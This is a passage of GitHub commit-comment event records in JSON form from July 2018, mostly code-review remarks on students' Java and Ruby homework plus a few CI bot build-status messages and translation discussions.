Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-22T17:39:31Z"}
{"id":"8000586573","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793600,"position":26,"line":26,"path":"src/HW4/Homework4Task3.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:39:33Z","updated_at":"2018-07-22T17:39:33Z","author_association":"NONE","body":"то же самое, не надо выводов здесь, все в мейн"}},"created_at":"2018-07-22T17:39:33Z"}
{"id":"8000586989","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793601,"position":8,"line":8,"path":"src/HW4/Homework4Task4.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:39:52Z","updated_at":"2018-07-22T17:39:52Z","author_association":"NONE","body":"надо определять динамически размер нового массива!"}},"created_at":"2018-07-22T17:39:52Z"}
{"id":"8000587060","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"miasma-rb/miasma-aws"},"payload":{"comment":{"id":29793602,"position":24,"line":816,"path":"lib/miasma/contrib/aws.rb","commit_id":"6d319ec9244b901cbd8b7fc71f1203611847cf76","created_at":"2018-07-22T17:39:56Z","updated_at":"2018-07-22T17:39:56Z","author_association":"CONTRIBUTOR","body":"the key is a string/symbol (not sure if string even works), not a Time"}},"created_at":"2018-07-22T17:39:56Z"}
{"id":"8000587267","type":"CommitCommentEvent","actor":{"login":"alexvins"},"repo":{"name":"vcmi/vcmi"},"payload":{"comment":{"id":29793603,"position":40,"line":49,"path":"AI/VCAI/MapObjectsEvaluator.cpp","commit_id":"21c1f47a7876af6db8947ae8a8827179b02e63a6","created_at":"2018-07-22T17:40:05Z","updated_at":"2018-07-22T17:40:05Z","author_association":"MEMBER","body":"`value` parameter is unused"}},"created_at":"2018-07-22T17:40:05Z"}
{"id":"8000587472","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793604,"position":13,"line":13,"path":"src/HW4/Homework4Task4.java","commit_id":"74533ae55bb7707b04412278be84588ca9f9b2e7","created_at":"2018-07-22T17:40:13Z","updated_at":"2018-07-22T17:40:13Z","author_association":"NONE","body":"функция должна принимать на вход двумерный массив, а на выходе линеаризованный"}},"created_at":"2018-07-22T17:40:13Z"}
{"id":"8000588593","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29793605,"position":null,"line":null,"path":null,"commit_id":"e2d2505943ff98ffb8a9363793d736cb920f2b7a","created_at":"2018-07-22T17:40:57Z","updated_at":"2018-07-22T17:40:57Z","author_association":"NONE","body":"kiva-non-quad-walls (nealkruis) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e2d2505943ff98ffb8a9363793d736cb920f2b7a-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-22T17:40:57Z"}
{"id":"8000589484","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793607,"position":25,"line":25,"path":"src/HW5/Homework5Task2.java","commit_id":"b72f0d8881406fb41c2a8973bd9debb8d5b2d4b7","created_at":"2018-07-22T17:41:35Z","updated_at":"2018-07-22T17:41:35Z","author_association":"NONE","body":"надо было вынести в отдельную функцию определение числа по римскому символу"}},"created_at":"2018-07-22T17:41:35Z"}
{"id":"8000589682","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793608,"position":5,"line":36,"path":"src/main/java/com/github/pavelhe/dao/jdbc/AuthorDaoJdbcImpl.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:41:44Z","updated_at":"2018-07-22T17:41:44Z","author_association":"NONE","body":"А почему JDBC классы остались?)"}},"created_at":"2018-07-22T17:41:44Z"}
{"id":"8000589711","type":"CommitCommentEvent","actor":{"login":"nlalonde"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29793609,"position":null,"line":null,"path":null,"commit_id":"1e37395517408be5f0907bd4e738c9baf4eb1134","created_at":"2018-07-22T17:41:45Z","updated_at":"2018-07-22T17:41:45Z","author_association":"MEMBER","body":"Oops, I didn't commit the new files. Thanks for reverting.\n\nOn Sat, Jul 21, 2018 at 3:51 AM Guo Xiang Tan <notifications@github.com>\nwrote:\n\n> @nlalonde <https://github.com/nlalonde> I had to revert this in 9afc4cf\n> <https://github.com/discourse/discourse/commit/9afc4cf8c1d7857d44d253e5f0fa3e4300459e93>\n> because the tests are failing with Error: Compile Error:\n> user-summary-category-search is not a helper\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/discourse/discourse/commit/1e37395517408be5f0907bd4e738c9baf4eb1134#commitcomment-29787713>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAJRTRXEGw4NPOpLZR8DabXl4wdIN0JCks5uIt2GgaJpZM4VZiYw>\n> .\n>\n"}},"created_at":"2018-07-22T17:41:45Z"}
{"id":"8000589780","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793610,"position":48,"line":48,"path":"src/HW5/Homework5Task2.java","commit_id":"b72f0d8881406fb41c2a8973bd9debb8d5b2d4b7","created_at":"2018-07-22T17:41:48Z","updated_at":"2018-07-22T17:41:48Z","author_association":"NONE","body":"не верно решена, к сожалению :("}},"created_at":"2018-07-22T17:41:48Z"}
{"id":"8000590465","type":"CommitCommentEvent","actor":{"login":"timothyhsieh"},"repo":{"name":"timothyhsieh/msgu"},"payload":{"comment":{"id":29793612,"position":null,"line":null,"path":null,"commit_id":"44ee64adef8f26cf38951a1b859167769fe883da","created_at":"2018-07-22T17:42:21Z","updated_at":"2018-07-22T17:42:21Z","author_association":"OWNER","body":"Created multidev environment [msgu#pr-1](https://dashboard.pantheon.io/sites/a133f0bb-8664-4ab1-8026-2ca11ca8aa7e#pr-1).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-1-msgu.pantheonsite.io/)"}},"created_at":"2018-07-22T17:42:21Z"}
{"id":"8000590987","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793615,"position":21,"line":21,"path":"src/HW5/Homework5Task2.java","commit_id":"b72f0d8881406fb41c2a8973bd9debb8d5b2d4b7","created_at":"2018-07-22T17:42:47Z","updated_at":"2018-07-22T17:42:47Z","author_association":"NONE","body":"не надо приводить символ в строку из одного символа, не оптимально по памяти"}},"created_at":"2018-07-22T17:42:47Z"}
{"id":"8000591285","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793616,"position":3,"line":3,"path":"src/HW6/Point.java","commit_id":"498bbdddd3e4a8e13a87ee6d9c6699503ffd1a92","created_at":"2018-07-22T17:43:02Z","updated_at":"2018-07-22T17:43:02Z","author_association":"NONE","body":"отступ между названием класса и полями"}},"created_at":"2018-07-22T17:43:02Z"}
{"id":"8000591777","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793618,"position":3,"line":3,"path":"src/HW6/Rectangle.java","commit_id":"498bbdddd3e4a8e13a87ee6d9c6699503ffd1a92","created_at":"2018-07-22T17:43:27Z","updated_at":"2018-07-22T17:43:27Z","author_association":"NONE","body":"у прямоугольника должно было быть два поля - точки"}},"created_at":"2018-07-22T17:43:27Z"}
{"id":"8000591787","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29793619,"position":null,"line":null,"path":null,"commit_id":"5b884f9ee35fd37cae5fff952141f126e186d892","created_at":"2018-07-22T17:43:27Z","updated_at":"2018-07-22T17:43:27Z","author_association":"OWNER","body":"DESTDIR is added to the MAKE_ARGS for the install target.  It's done by the framework.  It doesn't sound right that it's not working."}},"created_at":"2018-07-22T17:43:27Z"}
{"id":"8000592005","type":"CommitCommentEvent","actor":{"login":"mattbuzz94"},"repo":{"name":"mattbuzz94/zerograu"},"payload":{"comment":{"id":29793620,"position":null,"line":null,"path":null,"commit_id":"015ca29b33b431c3e493e703d9b53ef875ab20b4","created_at":"2018-07-22T17:43:37Z","updated_at":"2018-07-22T17:43:37Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [2a- Criar Classe Produto](https://trello.com/c/8RxjrUfl/11-2a-criar-classe-produto)"}},"created_at":"2018-07-22T17:43:37Z"}
{"id":"8000592072","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793621,"position":32,"line":32,"path":"src/HW6/Point.java","commit_id":"498bbdddd3e4a8e13a87ee6d9c6699503ffd1a92","created_at":"2018-07-22T17:43:40Z","updated_at":"2018-07-22T17:43:40Z","author_association":"NONE","body":"должен принимать точку, а не две координаты"}},"created_at":"2018-07-22T17:43:40Z"}
{"id":"8000592414","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"LoikoCvetlana/JD1"},"payload":{"comment":{"id":29793622,"position":10,"line":10,"path":"src/HW6/Rectangle.java","commit_id":"498bbdddd3e4a8e13a87ee6d9c6699503ffd1a92","created_at":"2018-07-22T17:43:55Z","updated_at":"2018-07-22T17:43:55Z","author_association":"NONE","body":"можно было просто у первой точки вызвать метод дистанс и передать вторую"}},"created_at":"2018-07-22T17:43:55Z"}
{"id":"8000592517","type":"CommitCommentEvent","actor":{"login":"clydomino"},"repo":{"name":"djobiii2078/igamersInsights"},"payload":{"comment":{"id":29793623,"position":2,"line":2,"path":"DashBoardRequirements","commit_id":"2a447186ca735e614fd75b4d0805d9b9b3264746","created_at":"2018-07-22T17:44:01Z","updated_at":"2018-07-22T17:44:01Z","author_association":"COLLABORATOR","body":"pour chaque match on a la date \r\nmais on ne connait qui l'ont joué"}},"created_at":"2018-07-22T17:44:01Z"}
{"id":"8000593051","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793624,"position":24,"line":24,"path":"homeworkfour/Task1.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:44:24Z","updated_at":"2018-07-22T17:44:24Z","author_association":"NONE","body":"код не отформатирован, использовать Ctrl + Alt + L перед коммитом"}},"created_at":"2018-07-22T17:44:24Z"}
{"id":"8000593492","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29793626,"position":3,"line":3,"path":"lesson2/fibonacci.rb","commit_id":"56e41d4aaf9cd184f01e828e1c395eda3e9cd651","created_at":"2018-07-22T17:44:46Z","updated_at":"2018-07-22T17:44:46Z","author_association":"NONE","body":"Мы рекомендуем тут использовать цикл while, а не loop. В while должно быть условие выполнения, и это положительно влияет на читаемость кода. Четче видно при каких условиях код будет выполняться. Только для этого переменную fib нужно будет определить вне цикла и перезаписывать ее значение внутри цикла."}},"created_at":"2018-07-22T17:44:46Z"}
{"id":"8000593750","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793627,"position":15,"line":15,"path":"homeworkfour/Task1.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:44:56Z","updated_at":"2018-07-22T17:44:56Z","author_association":"NONE","body":"метод должен выражать действие - глагол, а не существительное, давать имена функциям и переменным нормальные)"}},"created_at":"2018-07-22T17:44:56Z"}
{"id":"8000593791","type":"CommitCommentEvent","actor":{"login":"clydomino"},"repo":{"name":"djobiii2078/igamersInsights"},"payload":{"comment":{"id":29793628,"position":4,"line":4,"path":"DashBoardRequirements","commit_id":"2a447186ca735e614fd75b4d0805d9b9b3264746","created_at":"2018-07-22T17:44:58Z","updated_at":"2018-07-22T17:44:58Z","author_association":"COLLABORATOR","body":"possible*"}},"created_at":"2018-07-22T17:44:58Z"}
{"id":"8000594405","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793633,"position":19,"line":19,"path":"homeworkfour/Task1.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:45:24Z","updated_at":"2018-07-22T17:45:24Z","author_association":"NONE","body":"а почему не заменяешь последний элемент?"}},"created_at":"2018-07-22T17:45:24Z"}
{"id":"8000594779","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793635,"position":21,"line":21,"path":"homeworkfour/Task2.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:45:42Z","updated_at":"2018-07-22T17:45:42Z","author_association":"NONE","body":"выносить все в отдельные функции, в мейне только тестируем свой функционал"}},"created_at":"2018-07-22T17:45:42Z"}
{"id":"8000595380","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29793636,"position":null,"line":null,"path":null,"commit_id":"c20eae508865b286ccb5ea37c3ae0e695f32768b","created_at":"2018-07-22T17:46:11Z","updated_at":"2018-07-22T17:46:11Z","author_association":"CONTRIBUTOR","body":"J'utilise apprivoisement/domptage pour \"taming\"\r\net dressage/entraînement pour \"training\" pour faire la différence"}},"created_at":"2018-07-22T17:46:11Z"}
{"id":"8000595589","type":"CommitCommentEvent","actor":{"login":"VitorCosta8102"},"repo":{"name":"kelvinalves/batalhaNaval"},"payload":{"comment":{"id":29793638,"position":1,"line":1,"path":"Celula.java","commit_id":"c658c20b68f27ea1b76a8d4e585c75f2610c51fb","created_at":"2018-07-22T17:46:20Z","updated_at":"2018-07-22T17:46:20Z","author_association":"COLLABORATOR","body":"Ops! nao salvou as mudanças\r\n"}},"created_at":"2018-07-22T17:46:20Z"}
{"id":"8000595610","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29793639,"position":17,"line":17,"path":"lesson2/months.rb","commit_id":"56e41d4aaf9cd184f01e828e1c395eda3e9cd651","created_at":"2018-07-22T17:46:21Z","updated_at":"2018-07-22T17:46:21Z","author_association":"NONE","body":"В руби обычно, если блок однострочный и не более 100 символов в длину, его принято записывать в одну строку используя фигурные скобки."}},"created_at":"2018-07-22T17:46:21Z"}
{"id":"8000595686","type":"CommitCommentEvent","actor":{"login":"clydomino"},"repo":{"name":"djobiii2078/igamersInsights"},"payload":{"comment":{"id":29793640,"position":5,"line":5,"path":"DashBoardRequirements","commit_id":"2a447186ca735e614fd75b4d0805d9b9b3264746","created_at":"2018-07-22T17:46:25Z","updated_at":"2018-07-22T17:46:25Z","author_association":"COLLABORATOR","body":"on ne connait pas les points de chaque joueur"}},"created_at":"2018-07-22T17:46:25Z"}
{"id":"8000595706","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793641,"position":12,"line":12,"path":"homeworkfour/Task2.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:46:26Z","updated_at":"2018-07-22T17:46:26Z","author_association":"NONE","body":"не надо всегда с нуля начинать, достаточно с i + 1"}},"created_at":"2018-07-22T17:46:26Z"}
{"id":"8000596252","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793643,"position":11,"line":11,"path":"homeworkfour/Task3.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:46:51Z","updated_at":"2018-07-22T17:46:51Z","author_association":"NONE","body":"не надо делать отдельными переменными размеры массивов"}},"created_at":"2018-07-22T17:46:51Z"}
{"id":"8000596270","type":"CommitCommentEvent","actor":{"login":"clydomino"},"repo":{"name":"djobiii2078/igamersInsights"},"payload":{"comment":{"id":29793644,"position":7,"line":7,"path":"DashBoardRequirements","commit_id":"2a447186ca735e614fd75b4d0805d9b9b3264746","created_at":"2018-07-22T17:46:52Z","updated_at":"2018-07-22T17:46:52Z","author_association":"COLLABORATOR","body":"on ne connait pas leurs points\r\n"}},"created_at":"2018-07-22T17:46:52Z"}
{"id":"8000596491","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793645,"position":28,"line":28,"path":"homeworkfour/Task3.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:47:02Z","updated_at":"2018-07-22T17:47:02Z","author_association":"NONE","body":"зачем столько пустых строк оставлять?"}},"created_at":"2018-07-22T17:47:02Z"}
{"id":"8000597138","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"ahochel/warsawjs-workshop-22-converter"},"payload":{"comment":{"id":29793647,"position":1,"line":1,"path":".idea/misc.xml","commit_id":"b83c670fae74032e7030d7cc08fc08ff0722f4a0","created_at":"2018-07-22T17:47:30Z","updated_at":"2018-07-22T17:47:30Z","author_association":"NONE","body":"Nie wrzucajmy katalogu .idea\r\nDlaczego?\r\nOdpowiedź https://piecioshka.pl/blog/2017/02/06/globalna-konfiguracja-gita.html"}},"created_at":"2018-07-22T17:47:30Z"}
{"id":"8000597179","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793648,"position":31,"line":31,"path":"homeworkfour/Task3.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:47:32Z","updated_at":"2018-07-22T17:47:32Z","author_association":"NONE","body":"много циклов, все в одном можно было сделать"}},"created_at":"2018-07-22T17:47:32Z"}
{"id":"8000597589","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793649,"position":18,"line":18,"path":"homeworkfour/Task4.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:47:49Z","updated_at":"2018-07-22T17:47:49Z","author_association":"NONE","body":"а если размер двумерного массива больше двух?"}},"created_at":"2018-07-22T17:47:49Z"}
{"id":"8000597613","type":"CommitCommentEvent","actor":{"login":"lacarmen"},"repo":{"name":"yogthos/krueger"},"payload":{"comment":{"id":29793650,"position":11,"line":24,"path":"src/clj/krueger/layout.clj","commit_id":"446a71352cb34cd618d6a1f0ed89b6ca4b0e56b4","created_at":"2018-07-22T17:47:51Z","updated_at":"2018-07-22T17:47:51Z","author_association":"NONE","body":"Typo?"}},"created_at":"2018-07-22T17:47:51Z"}
{"id":"8000597766","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793651,"position":16,"line":16,"path":"homeworkfour/Task4.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:47:58Z","updated_at":"2018-07-22T17:47:58Z","author_association":"NONE","body":"не надо делать отступ в первой строчке функции"}},"created_at":"2018-07-22T17:47:58Z"}
{"id":"8000598395","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793652,"position":19,"line":19,"path":"src/main/java/com/github/pavelhe/dao/jpa/AuthorDaoJpaImpl.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:48:22Z","updated_at":"2018-07-22T17:48:22Z","author_association":"NONE","body":"1. Два раза делается ненужный boxing-unboxing.\r\n2. Это на самом деле оооочень тяжёлый запрос. Можно написать `select count(a) from Author a`, а также ещё TypedQuery.\r\n"}},"created_at":"2018-07-22T17:48:22Z"}
{"id":"8000598450","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793653,"position":47,"line":47,"path":"homeworkfour/Task4.java","commit_id":"65f06fcb7becaedb1b9e338a9dfc4820dadfdaa8","created_at":"2018-07-22T17:48:24Z","updated_at":"2018-07-22T17:48:24Z","author_association":"NONE","body":"очень сложно написано, и не совсем верно :("}},"created_at":"2018-07-22T17:48:24Z"}
{"id":"8000598600","type":"CommitCommentEvent","actor":{"login":"clydomino"},"repo":{"name":"djobiii2078/igamersInsights"},"payload":{"comment":{"id":29793654,"position":9,"line":9,"path":"DashBoardRequirements","commit_id":"2a447186ca735e614fd75b4d0805d9b9b3264746","created_at":"2018-07-22T17:48:30Z","updated_at":"2018-07-22T17:48:30Z","author_association":"COLLABORATOR","body":"exactement\r\n"}},"created_at":"2018-07-22T17:48:30Z"}
{"id":"8000598868","type":"CommitCommentEvent","actor":{"login":"clydomino"},"repo":{"name":"djobiii2078/igamersInsights"},"payload":{"comment":{"id":29793655,"position":11,"line":11,"path":"DashBoardRequirements","commit_id":"2a447186ca735e614fd75b4d0805d9b9b3264746","created_at":"2018-07-22T17:48:41Z","updated_at":"2018-07-22T17:48:41Z","author_association":"COLLABORATOR","body":"en effet"}},"created_at":"2018-07-22T17:48:41Z"}
{"id":"8000598891","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29793656,"position":null,"line":null,"path":null,"commit_id":"c20eae508865b286ccb5ea37c3ae0e695f32768b","created_at":"2018-07-22T17:48:42Z","updated_at":"2018-07-22T17:48:42Z","author_association":"CONTRIBUTOR","body":"Je verrai. Si il y a encore un problème de taille, j'utiliserai domptage à l'avenir. \r\nIl n'empêche que dompter un chinchilla, par exemple, me paraît toujours un peu ridicule (c'est supposé être réservé à des animaux plus dangereux)."}},"created_at":"2018-07-22T17:48:42Z"}
{"id":"8000599043","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29793657,"position":15,"line":28,"path":"src/formatter/config/WrapConfig.hx","commit_id":"926af393bf8f1f7f68b2b88111b4dfb0d97b2b7d","created_at":"2018-07-22T17:48:50Z","updated_at":"2018-07-22T17:48:50Z","author_association":"MEMBER","body":"yeah, thought about that too\r\nbut it's more a work in progress, we'll have to see if those options work..."}},"created_at":"2018-07-22T17:48:50Z"}
{"id":"8000599160","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793658,"position":36,"line":36,"path":"src/main/java/com/github/pavelhe/dao/jpa/AuthorDaoJpaImpl.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:48:56Z","updated_at":"2018-07-22T17:48:56Z","author_association":"NONE","body":"Отличное название! Оценил"}},"created_at":"2018-07-22T17:48:56Z"}
{"id":"8000599670","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793659,"position":26,"line":26,"path":"homeworkfive/Task1.java","commit_id":"793e0d4e33b7da7c98d3fc4470c593df7ffe5fd1","created_at":"2018-07-22T17:49:18Z","updated_at":"2018-07-22T17:49:18Z","author_association":"NONE","body":"надо сравнивать все слово, а не только первый и последний символ"}},"created_at":"2018-07-22T17:49:18Z"}
{"id":"8000599974","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793661,"position":34,"line":34,"path":"homeworkfive/Task1.java","commit_id":"793e0d4e33b7da7c98d3fc4470c593df7ffe5fd1","created_at":"2018-07-22T17:49:34Z","updated_at":"2018-07-22T17:49:34Z","author_association":"NONE","body":"не увидел задачки с римскими :("}},"created_at":"2018-07-22T17:49:34Z"}
{"id":"8000600307","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793662,"position":15,"line":15,"path":"homeworksix/Point.java","commit_id":"3815102cac13bdbafeec91af0c38ba5099a9a1a8","created_at":"2018-07-22T17:49:50Z","updated_at":"2018-07-22T17:49:50Z","author_association":"NONE","body":"отступ между классом и полями"}},"created_at":"2018-07-22T17:49:50Z"}
{"id":"8000600408","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793663,"position":45,"line":45,"path":"homeworksix/Point.java","commit_id":"3815102cac13bdbafeec91af0c38ba5099a9a1a8","created_at":"2018-07-22T17:49:55Z","updated_at":"2018-07-22T17:49:55Z","author_association":"NONE","body":"форматируем код"}},"created_at":"2018-07-22T17:49:55Z"}
{"id":"8000600495","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"dwk5/ruby_basics"},"payload":{"comment":{"id":29793664,"position":5,"line":5,"path":"lesson2/vowels.rb","commit_id":"56e41d4aaf9cd184f01e828e1c395eda3e9cd651","created_at":"2018-07-22T17:50:00Z","updated_at":"2018-07-22T17:50:00Z","author_association":"NONE","body":"Тут v откуда-то в индекс передается. Наверно осталась с прошлой реализации."}},"created_at":"2018-07-22T17:50:00Z"}
{"id":"8000600760","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"kawaakari/Homework"},"payload":{"comment":{"id":29793666,"position":14,"line":14,"path":"homeworksix/Test.java","commit_id":"3815102cac13bdbafeec91af0c38ba5099a9a1a8","created_at":"2018-07-22T17:50:12Z","updated_at":"2018-07-22T17:50:12Z","author_association":"NONE","body":"прямоугольника не нашел :("}},"created_at":"2018-07-22T17:50:12Z"}
{"id":"8000601566","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29793667,"position":null,"line":null,"path":null,"commit_id":"4a6dafa3c7ccfc6f7da9970a834b818c5442fd9b","created_at":"2018-07-22T17:50:50Z","updated_at":"2018-07-22T17:50:50Z","author_association":"OWNER","body":"We might need to revert this."}},"created_at":"2018-07-22T17:50:50Z"}
{"id":"8000601769","type":"CommitCommentEvent","actor":{"login":"scottsalvaggio"},"repo":{"name":"scottsalvaggio/project2"},"payload":{"comment":{"id":29793668,"position":null,"line":null,"path":null,"commit_id":"6dda35b46e08f648488e1114b168d81027847609","created_at":"2018-07-22T17:51:00Z","updated_at":"2018-07-22T17:51:00Z","author_association":"OWNER","body":"This doesn't work. You need to use `import bisect`."}},"created_at":"2018-07-22T17:51:00Z"}
{"id":"8000601956","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"OsetrovaD/JavaHomework"},"payload":{"comment":{"id":29793670,"position":21,"line":21,"path":"src/lesson4secondattempt/Task1.java","commit_id":"f997f3d51f529bec96b22d045f812f58add8c35d","created_at":"2018-07-22T17:51:07Z","updated_at":"2018-07-22T17:51:07Z","author_association":"NONE","body":"зачем в метода по сдвигу массива - выводить в консоль? выводить надо в мейне, типо теста"}},"created_at":"2018-07-22T17:51:07Z"}
{"id":"8000602138","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"PavelHe/otus-books"},"payload":{"comment":{"id":29793671,"position":47,"line":47,"path":"src/main/java/com/github/pavelhe/dao/jpa/BookDaoJpaImpl.java","commit_id":"b9dad99b916a325c699dd58f47085e7c8565d9e5","created_at":"2018-07-22T17:51:14Z","updated_at":"2018-07-22T17:51:14Z","author_association":"NONE","body":"Вот я бы целиком бы книгу сохранял. Это в JDBC такие параметры нужно делать, а здесь - попросту незачем."}},"created_at":"2018-07-22T17:51:14Z"}
{"id":"8000602326","type":"CommitCommentEvent","actor":{"login":"n-t-roff"},"repo":{"name":"n-t-roff/heirloom-doctools"},"payload":{"comment":{"id":29793672,"position":null,"line":null,"path":null,"commit_id":"fd2816bbce0e5f8830e5c977cdaf8d322d84db10","created_at":"2018-07-22T17:51:22Z","updated_at":"2018-07-22T17:51:22Z","author_association":"OWNER","body":"LAFACT should be made variable (or depending on something like .letcalc).\r\n\r\nIf possible it would be good to change the document source to a form which makes it possible to build it.\r\n\r\nNormally you can delete typo-tests anyway and re-fork to get the latest patches."}},"created_at":"2018-07-22T17:51:22Z"}
{"id":"8000603029","type":"CommitCommentEvent","actor":{"login":"AlexHaxe"},"repo":{"name":"HaxeCheckstyle/haxe-formatter"},"payload":{"comment":{"id":29793674,"position":38,"line":295,"path":"checkstyle.json","commit_id":"926af393bf8f1f7f68b2b88111b4dfb0d97b2b7d","created_at":"2018-07-22T17:51:56Z","updated_at":"2018-07-22T17:51:56Z","author_association":"MEMBER","body":"well it doesn't make sense if you have to add lots of excludes\r\nAlso: Cyclomatic complexity and switch…case don't really play along well... "}},"created_at":"2018-07-22T17:51:56Z"}
